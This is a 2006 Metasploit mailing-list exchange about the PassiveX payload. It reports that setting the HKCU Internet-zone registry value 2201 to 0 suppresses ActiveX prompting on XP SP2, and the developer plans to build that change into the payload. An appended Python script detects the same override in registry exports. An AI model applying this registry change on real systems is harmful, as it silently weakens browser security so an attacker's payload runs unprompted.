Metasploit mailing list archives
Using the PassiveX payload
From: mmiller at hick.org (mmiller at hick.org)
Date: Fri, 5 May 2006 11:32:11 -0500
On Fri, May 05, 2006 at 06:18:44PM +0200, Feature Meister wrote:
> Hi, the dll does not get downloaded into %WINDIR%\Downloaded Program Files.
>
> After some more troubleshooting and debugging (with Process Explorer) I found out that the hidden IE is started with "...\iexplore.exe -new http://192.168.71.75:8000/". So I tried this one from a regular command line. Result: IE prevented an ActiveX control from being loaded and executed automatically. Instead I was presented with a pop-up and the usual IE information bar.
>
> I then looked at the security settings of Internet-Zone. Besides "Automatic prompting for ActiveX controls" everything was set so that the control would execute without asking. However, the above setting was set to "Disable". I changed it to "Enable" according to the helpful help dialog ;-) and tried it again: it works!
>
> The required setting in HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 would be:
>
> "2201"=dword:00000000
>
> Probably this could be added to the actual exploit code?

Yeah, this sounds like another registry value we need to add to make it work properly in XPSP2. Thanks for the info! We'll look at adding this in a future version of the payload. Should only increase the size by four bytes.
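
A check a defender could run over `reg export` text to spot the per-user Internet-zone override named in this thread. This is an added example, not part of the original messages or of Metasploit's code; the function name, the watch list and the sample export are constructed for illustration.

```python
import re

# Zone 3 (Internet zone) key path from the thread, lower-cased for comparison.
ZONE3 = r"software\microsoft\windows\currentversion\internet settings\zones\3"
# URL action named in the thread; 0 is the "Enable" value the poster reports.
WATCHED = {"2201": "Automatic prompting for ActiveX controls"}

# Constructed sample in `reg export` text format (not taken from a real host).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"DisplayName"="Internet"
"2201"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"2201"=dword:00000000
'''

KEY_RE = re.compile(r"^\[(?P<hive>[^\\\]]+)\\(?P<path>.+)\]$")
DWORD_RE = re.compile(r'^"(?P<name>[^"]+)"=dword:(?P<hex>[0-9a-fA-F]{8})$')


def find_zone3_overrides(reg_text):
    """Return watched URL actions set to 0 under the HKCU Internet zone key."""
    findings = []
    in_zone3 = False
    key = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            # A new [key] section starts; only the per-user Zones\3 key counts.
            key = line[1:-1]
            in_zone3 = (m.group("hive").upper() in ("HKEY_CURRENT_USER", "HKCU")
                        and m.group("path").lower() == ZONE3)
            continue
        m = DWORD_RE.match(line)
        if in_zone3 and m and m.group("name") in WATCHED:
            value = int(m.group("hex"), 16)
            if value == 0:
                findings.append({"key": key, "name": m.group("name"),
                                 "value": value,
                                 "setting": WATCHED[m.group("name")]})
    return findings


if __name__ == "__main__":
    for f in find_zone3_overrides(SAMPLE_REG):
        print("{key}: {name}={value} ({setting})".format(**f))
```

`reg export` writes UTF-16 files, so decode the file before passing its text to the function.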